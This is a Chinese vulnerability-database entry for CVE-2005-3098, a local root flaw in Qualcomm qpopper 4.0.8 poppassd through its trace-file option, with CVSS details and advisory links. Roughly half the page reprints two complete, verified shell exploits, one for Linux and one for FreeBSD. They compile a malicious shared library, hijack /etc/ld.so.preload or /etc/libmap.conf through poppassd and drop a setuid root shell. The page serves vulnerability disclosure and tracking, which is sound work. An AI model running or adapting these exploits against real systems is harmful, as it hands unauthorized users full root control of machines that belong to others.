CVE-2005-3098
CVSS4.6
发布时间 :2005-09-28 19:03:00
修订时间 :2011-03-07 21:25:48
NMCOE    

[原文]poppassd in Qualcomm qpopper 4.0.8 allows local users to modify arbitrary files and gain privileges via the -t (trace file) command line argument.


[CNNVD]Qualcomm qpopper 本地任意文件修改及权限提升漏洞(CNNVD-200509-292)

        QPopper是一款由Qualcomm开发和维护免费开放源代码的POP3软件,可使用在多种Linux和Unix操作系统下。
        Qualcomm qpopper 4.0.8版本的poppassd协议存在安全漏洞,本地用户可通过命令行参数-t(跟踪文件)修改任意文件或获取特权。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3098
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3098
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-292
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/1844
(UNKNOWN)  VUPEN  ADV-2005-1844
http://www.securityfocus.com/bid/14944
(UNKNOWN)  BID  14944
http://secunia.com/advisories/16935
(VENDOR_ADVISORY)  SECUNIA  16935
http://seclists.org/lists/fulldisclosure/2005/Sep/0652.html
(VENDOR_ADVISORY)  FULLDISC  20050924 It's time for some warez - Qpopper poppassd local r00t exploit

- 漏洞信息

Qualcomm qpopper 本地任意文件修改及权限提升漏洞
中危 设计错误
2005-09-28 00:00:00 2005-10-20 00:00:00
本地  
        QPopper是一款由Qualcomm开发和维护免费开放源代码的POP3软件,可使用在多种Linux和Unix操作系统下。
        Qualcomm qpopper 4.0.8版本的poppassd协议存在安全漏洞,本地用户可通过命令行参数-t(跟踪文件)修改任意文件或获取特权。

- 公告与补丁

        暂无数据

- 漏洞信息 (1229)

Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux) (EDBID:1229)
linux local
2005-09-24 Verified
0 Kingcope
N/A [点击下载]
#!/bin/sh
# tested and working /str0ke
###########################################################################
# Linux Qpopper poppassd latest version local r00t exploit by kcope     ###
# August 2005                                                           ###
# Confidential - Keep Private!                                          ###
###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd

echo ""
echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/ld.so.preload ]; then
echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"
exit
fi
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 if (!geteuid()) {
 setgid(0);
 setuid(0);
 remove("/etc/ld.so.preload");
 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
 }
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       unlink("/tmp/suid");
       execl("/bin/sh","sh",0); }
_EOF

gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -t /etc/ld.so.preload
echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload
su
if [ -f /tmp/suid ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/suid
else
echo "Sorry, exploit failed."
fi

# milw0rm.com [2005-09-24]
		

- 漏洞信息 (1230)

Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd) (EDBID:1230)
bsd local
2005-09-24 Verified
0 Kingcope
N/A [点击下载]
#!/bin/sh
###########################################################################
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
# tested on FreeBSD 5.4-RELEASE                                         ###
###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd
HOOKLIB=libutil.so.4

echo ""
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/libmap.conf ]; then
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
exit
fi
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 if (!geteuid()) {
 remove("/etc/libmap.conf");
 execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
 }
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -t /etc/libmap.conf
echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
su
if [ -f /tmp/xxxx ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/xxxx
else
echo "Sorry, exploit failed."
fi

# milw0rm.com [2005-09-24]
		

- 漏洞信息

19683
Qpopper poppassd Trace File Creation Local Privilege Escalation
Local Access Required
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-09-24 Unknow
2005-09-24 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站